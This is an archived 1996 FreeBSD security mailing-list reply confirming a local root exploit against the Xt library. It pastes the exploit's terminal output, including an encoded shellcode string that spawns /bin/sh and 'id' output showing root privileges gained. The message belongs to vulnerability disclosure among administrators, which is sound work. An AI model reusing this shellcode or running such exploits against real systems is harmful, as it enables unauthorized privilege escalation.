Date: Sun, 25 Aug 1996 13:48:21 +0200 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@FreeBSD.ORG Cc: security-officer@FreeBSD.ORG Subject: Re: Vulnerability in the Xt library (fwd) Message-ID: <199608251148.NAA25686@keltia.freenix.fr> In-Reply-To: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>; from Kent Hamilton on Aug 25, 1996 1:05:20 -0500 References: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
next in thread | previous in thread | raw e-mail | index | archive | help
--Tkw3iuTSQTdrZTDt
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
According to Kent Hamilton:
> Thought this might be of interest.
I confirm that it works like a charm here :-(
=20
357 [13:44] roberto@keltia:~/src/C> ./exploit=20
Using offset of esp + 0 (efbfd3b0)
Buffer size 1491
Warning: Color name "=EB#^^
1=D2VVVV1=C0=B0;N
=CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3=
=BF=EF=B4=D3=BF=EF=EB#^^
1=D2VVVV1=
=C0=B0;N
=
=CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3=BF=EF=B4=D3=BFH=B3=BF=EF!
# id
uid=3D101(roberto) euid=3D0(root) gid=3D10(staff) groups=3D10(staff), 0(whe=
el), 2(kmem), 5(operator), 6(man), 8(news), 15(cvs), 20(majordom), 21(list)=
, 100(copains), 117(dialer), 2000(dos), 2001(tex)
I saw the discussion on Bugtraq. There are a lot of fixed buffers in X as I
recall.
--=20
Ollivier ROBERT -=3D- The daemon is FREE! -=3D- roberto@keltia.freeni=
x.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #18: Sun Aug 18 19:16:52 MET DST 1996
--Tkw3iuTSQTdrZTDt
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
iQCVAwUBMiA9gwDy2QnruxtBAQGybgP/SFbjUahCvBxn2C7SR8irUwKquF6mOdcS
Z4skE4JF8m1Lf86Nn9ixxs0WIpVtLMQcP5AcijkiMQGPHhwBgRTqPJcTOufkfpP0
9y1iKxWMnB4zxgxpJbT1DHOVhrKRqbbn1xHO/W+i6eH6WHrLRKyCC1j7k1YZBLL4
YQr0Z9n5Bo4=
=sX2i
-----END PGP SIGNATURE-----
--Tkw3iuTSQTdrZTDt--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199608251148.NAA25686>